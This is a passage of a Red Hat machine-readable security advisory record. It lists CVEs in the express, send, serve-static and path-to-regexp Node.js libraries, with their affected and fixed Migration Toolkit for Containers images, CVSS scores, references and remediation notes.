"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", 